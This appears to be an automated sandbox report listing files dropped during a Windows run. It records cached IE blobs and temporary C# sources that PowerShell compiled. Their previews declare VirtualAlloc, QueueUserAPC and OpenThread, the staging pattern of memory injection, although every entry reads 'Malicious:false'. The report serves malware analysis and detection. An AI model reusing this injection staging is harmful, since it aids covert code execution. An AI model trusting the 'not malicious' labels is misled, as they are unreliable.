                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):2416
                  Entropy (8bit):5.9908312607114445
                  Encrypted:false
                  SSDEEP:48:wZi+Rwg9hTol/gkze+JOu/JVe/a2v7RHvztNVmedx2LXOqO:R+XDolbzNOG52zphHm0x2TXO
                  MD5:79CA0C4D7826B90D41F415CC96D7BC11
                  SHA1:724874697500F122ED0DAD92CDD31B3D15A40B6E
                  SHA-256:341AB2761AC6AE8232F11602705B1A955C48100E11C19A80AF50CEA91C347D5A
                  SHA-512:F4CA14A81AC477DFF8B7163E5068CEAB3B29B0DDF47F33A9141148E7F4BCA8FAB852F3276A58E0EBD7A26C55A1580C935BE50DD72E8623FFAB6148251A0A0D44
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\61e7ecfdaae1b[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):2416
                  Entropy (8bit):5.9908312607114445
                  Encrypted:false
                  SSDEEP:48:wZi+Rwg9hTol/gkze+JOu/JVe/a2v7RHvztNVmedx2LXOqO:R+XDolbzNOG52zphHm0x2TXO
                  MD5:79CA0C4D7826B90D41F415CC96D7BC11
                  SHA1:724874697500F122ED0DAD92CDD31B3D15A40B6E
                  SHA-256:341AB2761AC6AE8232F11602705B1A955C48100E11C19A80AF50CEA91C347D5A
                  SHA-512:F4CA14A81AC477DFF8B7163E5068CEAB3B29B0DDF47F33A9141148E7F4BCA8FAB852F3276A58E0EBD7A26C55A1580C935BE50DD72E8623FFAB6148251A0A0D44
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\61e7ecf40e475[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):246652
                  Entropy (8bit):5.999799526591325
                  Encrypted:false
                  SSDEEP:3072:ZJQG7/2X/uzTIESoK9IWI1uQLvNZPailZ9RcOwvsHoVqYrLY7yUfMqWlpOF2AKhJ:Zr2XssogcLvnPBZ9/wvsIHnwUB3UUJZ
                  MD5:4F48695EA7A9FFBD212435D95F2E145A
                  SHA1:358796D62FB21B6749AE151A4D89A42E64727F80
                  SHA-256:D7E95FCEAC8DC9B9F4C29CFADF743643010E3D063A467C54FCFB08C305B98A07
                  SHA-512:A581FD6A760C11D0260492D5274ADC186640EBC23F5205FF66264EE5FB07C8A773651CA30F679DA6B30C72B04CEEA9FE86424B04AF10D89557CC8C802941C81E
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\61e7ecf8ef324[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):246652
                  Entropy (8bit):5.999799526591325
                  Encrypted:false
                  SSDEEP:3072:ZJQG7/2X/uzTIESoK9IWI1uQLvNZPailZ9RcOwvsHoVqYrLY7yUfMqWlpOF2AKhJ:Zr2XssogcLvnPBZ9/wvsIHnwUB3UUJZ
                  MD5:4F48695EA7A9FFBD212435D95F2E145A
                  SHA1:358796D62FB21B6749AE151A4D89A42E64727F80
                  SHA-256:D7E95FCEAC8DC9B9F4C29CFADF743643010E3D063A467C54FCFB08C305B98A07
                  SHA-512:A581FD6A760C11D0260492D5274ADC186640EBC23F5205FF66264EE5FB07C8A773651CA30F679DA6B30C72B04CEEA9FE86424B04AF10D89557CC8C802941C81E
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\61e7ecf8f3a99[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):246652
                  Entropy (8bit):5.999799526591325
                  Encrypted:false
                  SSDEEP:3072:ZJQG7/2X/uzTIESoK9IWI1uQLvNZPailZ9RcOwvsHoVqYrLY7yUfMqWlpOF2AKhJ:Zr2XssogcLvnPBZ9/wvsIHnwUB3UUJZ
                  MD5:4F48695EA7A9FFBD212435D95F2E145A
                  SHA1:358796D62FB21B6749AE151A4D89A42E64727F80
                  SHA-256:D7E95FCEAC8DC9B9F4C29CFADF743643010E3D063A467C54FCFB08C305B98A07
                  SHA-512:A581FD6A760C11D0260492D5274ADC186640EBC23F5205FF66264EE5FB07C8A773651CA30F679DA6B30C72B04CEEA9FE86424B04AF10D89557CC8C802941C81E
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\61e7ecf95f22c[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):2416
                  Entropy (8bit):5.9908312607114445
                  Encrypted:false
                  SSDEEP:48:wZi+Rwg9hTol/gkze+JOu/JVe/a2v7RHvztNVmedx2LXOqO:R+XDolbzNOG52zphHm0x2TXO
                  MD5:79CA0C4D7826B90D41F415CC96D7BC11
                  SHA1:724874697500F122ED0DAD92CDD31B3D15A40B6E
                  SHA-256:341AB2761AC6AE8232F11602705B1A955C48100E11C19A80AF50CEA91C347D5A
                  SHA-512:F4CA14A81AC477DFF8B7163E5068CEAB3B29B0DDF47F33A9141148E7F4BCA8FAB852F3276A58E0EBD7A26C55A1580C935BE50DD72E8623FFAB6148251A0A0D44
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\61e7ecfaebed4[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\61e7ecfb30839[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):11606
                  Entropy (8bit):4.883977562702998
                  Encrypted:false
                  SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                  MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                  SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                  SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                  SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                  Malicious:false
                  Reputation:unknown
                  Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.9260988789684415
                  Encrypted:false
                  SSDEEP:3:Nlllulb/lj:NllUb/l
                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                  Malicious:false
                  Reputation:unknown
                  Preview: @...e................................................@..........
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.250930918891396
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f57hG9zxs7+AEszIWXp+N23f57hGY:p37Lvkmb6KHx1eWZE8x1T
                  MD5:E76EA577ABBAF50F936BA287CF51D4F9
                  SHA1:5E7343823FDF2D3147F4CC9F67318B6AB5098B44
                  SHA-256:CDCE95E9974A6D3C28283D3248CD9A8EF1B4E4A0D4F4CC0E1C405C2B387F390A
                  SHA-512:751C7D3E39C9A762875D8637FA5CF033CE3FC27C4AD2586CEB29E0021913C07BCE53FEB0CB08F392D62AD4FED9BB9C59D10FE27B4670A3B8CCE5056B1313F96D
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs"
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6001943211961662
                  Encrypted:false
                  SSDEEP:24:etGSf/W2dg85xsF2uhyjxdWJHiXE4tkZfBBy4b+WI+ycuZhNjakSFPNnq:6Wkb5xs0PWQXEvJBs4bl1ulja3fq
                  MD5:6BCA11EE2BE4B6DB112662334D1F25FA
                  SHA1:F9772D39DEAE3987C1EB643C1C30D96FB18A67F3
                  SHA-256:8F510015742554FAB6479E07C141C59701593B395373A2F978B4239656B4B3D7
                  SHA-512:4C68A644E04B25C4FBB62ABF3FEE1F05DB9D2D4F40808C848377C6EAE3559B8A3838F955FF5EFD396A83BEB0908473DCA9B6582CBE62883210A2651A82123527
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.335370208193909
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHzE8OKaM5DqBVKVrdFAMBJTH:Ukka6AzE8OKxDcVKdBJj
                  MD5:4308EAC7B06E02BD2A64957B2AF4E82F
                  SHA1:8C9839AED3CAE603484A62564F60F6BD2F08DDB4
                  SHA-256:76D3A4A2C4C4FD18902DFEE5069BB94F810C595A3215EB3525DCF51BFA4172F6
                  SHA-512:B04C8271CB82FCA5B2C2A83F02FB92F01497D7F01F3833A8C1DD5D09A151D19BC2B6183E8BDF73ACBE6509C39E33460946DC42D26DD378520A70A08A438C9751
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\11mxocay\CSCC5AC99B8323C4ED88D9ECC76C0BE5E59.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.1028745539769926
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                  MD5:CB9CF9636E54AC81E32844664B16B0C5
                  SHA1:A8BEDFC693A4826E80D8DBDABE852BFB342B9476
                  SHA-256:9C3E87A2B7375C241F3D96678783D7D55AD3B8ADAA03090B835A8B4D8F88FA50
                  SHA-512:0E48BA346580502BBAD15182D6925D646CE4D645571F9C0BE1C58171570AF987DE698BC37DC7F199F5922830FA6BADF495A4560A14B87CBCDA203428652879A9
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.249752581955158
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fXSzxs7+AEszIWXp+N23fXX:p37Lvkmb6KHaWZE8/
                  MD5:925768B60B9A537FB21804693072A49A
                  SHA1:FC022A54A9A4875AFFBAB7FC3E30B9A20DCE3538
                  SHA-256:F420C31377AFD02797261875F3CB01DB674AC455B4B01DF7EBB40743BD75776E
                  SHA-512:231978A1E60E7D0C598FCA59FDDD5FA991CEB73786DDC75041EFB29C18F8E13C6755A5B5FDBE394799EFEA92AE4B1FB742342CF93464563BEC2207C4C0470CA5
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs"
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.615837381511974
                  Encrypted:false
                  SSDEEP:24:etGSU8OmU0t3lm85z7ntQW6gfg9G4laUtkZfhBm3VUWI+ycuZhNzakSVPNnq:6uXQ3r5uJarJhUF31ulza3Pq
                  MD5:FC946B38BEA4BE8AE31E718A56582B95
                  SHA1:3C4B86BBD75DAE6762E8E1C3A28FE22783D4C134
                  SHA-256:9BA9D2814D1507671DF5C6554175A06F2FB8214EBC0D12C076071C9994837A87
                  SHA-512:B5BDA3AFD6B3F6462255831903EDB8FA744FAFDF96E4745D05C922D6DEA66C01F33FDC10133D08553B04326F526E95DA90058E678D68C667619AE323CBB6DA6E
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.3275407456168615
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KH7E8mKaM5DqBVKVrdFAMBJTH:Ukka6A7E8mKxDcVKdBJj
                  MD5:A25D57B00C1641A6F7A16AE40A82E7B2
                  SHA1:9FCAF763F363669E0CC90B060DA3183AE72B9DD9
                  SHA-256:D0ED793261B3AFB9E59DF0E69F32966348B4713C6CE82EEC0E9C81A0880F8EEB
                  SHA-512:094C48DB60E946B0E92DF14A3C08753129E499D81CE90B7AE2F0E7ADB90B7A249994A2AE7429B33BFD9BA8834D741B955DBA9320DD4EB9B83325394B68527826
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.097209924400671
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryU+ak7YnqqlfPN5Dlq5J:+RI+ycuZhNzakSVPNnqX
                  MD5:2906F165CE191CD0ED870B7268D26120
                  SHA1:9F18AD59158BC56ECE7CF476EA838C43F4EE0AD5
                  SHA-256:501EADA57DB6C544315F3F635DFD3D893F3E886A7700B23B2F23C48EC16D1741
                  SHA-512:00B9FE5767F0973F5DB367DB44F7AF02B58F96F0F1C1C76FE6A1DECEDBB8DF41D456763B17155848EF1325E1C02A48E37B932B3ABFD1CF0060EEE7A2C7E697C9
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):267
                  Entropy (8bit):4.398088139297247
                  Encrypted:false
                  SSDEEP:3:oVXXOFI898JOGXnHOFIW+lOFI2OI7W8JOGXnHOFI2OINC+lOFJTNAW8JOGXnHOFx:o9+59quqMUBquUIMDTN9quDTAC
                  MD5:23E104FB8C30D1E29BCD56F8AF913256
                  SHA1:B8A04499A067980BE5EBBF1965DDE141DA8AE291
                  SHA-256:8878D9B63CCC0B9E28F387073347183776E666C12A8EFEE209331250093D6F7C
                  SHA-512:53C60B8172B940649E2FE9A1BD27E57DC7CAE83ED5434A506C060E5D9A32669C24B736106BD5AD27E05E94671078394CF30077DA5B1072222E80AF79C58F9967
                  Malicious:false
                  Reputation:unknown
                  Preview: [2022/01/19 11:50:26.586] Latest deploy version: ..[2022/01/19 11:50:26.586] 11.211.2 ..[2022/01/19 11:50:29.812] Latest deploy version: ..[2022/01/19 11:50:29.812] 11.211.2 ..[2022/01/19 11:50:36.004] Latest deploy version: ..[2022/01/19 11:50:36.004] 11.211.2 ..
                  C:\Users\user\AppData\Local\Temp\RES4702.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):4.005897242454003
                  Encrypted:false
                  SSDEEP:24:HqzW91gIXAK+hH2hhKfmNwI+ycuZhNPakSBPNnq92d:efLWvKfmm1ulPa3zq9G
                  MD5:D03CFDA18E6411A2D1DDF56684050E6C
                  SHA1:1203C1FD48E8AC4B4ED10965B3F4F96F2E7C7D98
                  SHA-256:FA286FBC9D5B3939556B1FB81987857D5B818723E5FF1828E6DE0F2448262654
                  SHA-512:CA76D1BC94FAAFE202E48C9901FC2E507911B1F0DD9481C6EE5095D252D48D52EDB28B78F860FD6764F2B457EBC272873E1BC91E4C6010D21939D3B03A57568D
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\RES49B1.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):3.9822008344864663
                  Encrypted:false
                  SSDEEP:24:HZzW9JLMJ79hH/hKfmNwI+ycuZhNzakSVPNnq92d:u4J7P5Kfmm1ulza3Pq9G
                  MD5:621906E7E2E135943F4AF346F6F00CB1
                  SHA1:A20D375E0AC8EEF4CEDB5E992102E2DBEDECFC13
                  SHA-256:64E79EC5AA16DC5BE735D504C566D7D1E2A9FC5EFF9D6702FFA533A24828DB18
                  SHA-512:B27C3CFBB61E3BB2223908B9386B0F5CF467B7CC3BA946542B91C77B0F510639D3AE178971AAA3F3651D1305A0C561E350DA961A4EF1CCDD002DFA18BEB6307E
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\RES4D3C.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):3.9879745328761844
                  Encrypted:false
                  SSDEEP:24:HZzW91gz6FgKhHDhKfmNwI+ycuZhNKqYakS7qNPNnq92d:Rz7ONKfmm1ulKxa37Kq9G
                  MD5:0D6299E70F682FA23FD130E6F7F671D9
                  SHA1:D683F3859DD86B439D09DA17EDCED0DAFCBBD0CE
                  SHA-256:A50A003AA80FA35F1608C1DD27CB05AEF40D576778E940EEAFF2C772FFE1063F
                  SHA-512:5BE965C06EF00CB448B39E95CF9D4A9274EF3D0BE1BFC6D4BE1FC652AB52B13FDCF5A01D01130C516DC67455599390E9C2B2CC32E83891F64AEECFE5009A42B5
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\RES522D.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):4.001046525520606
                  Encrypted:false
                  SSDEEP:24:HfzW91gNsXhHUjhKfmNwI+ycuZhN+GakSxXPNnq92d:nNsx0NKfmm1ulfa3Dq9G
                  MD5:213F99044F3A0C6DC54076D987A4F6D7
                  SHA1:0DBF8D16738EC5D6F0C2C6E1FD4D127E0282F27D
                  SHA-256:ADEDCAAD84CCDE5005ABD9382054A0F3E86450B00548EFD614C0C38883398BE7
                  SHA-512:0369AFB7D915828547BBAAD58E466330178B0C467703A53DA3DE019C71E1D5F9A5D1AD86908C5F0BCBD72A3C027A65C8D7418471540D0C069B451E002EA2B25A
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0eawyjup.aqv.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb5zdlfp.z1g.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
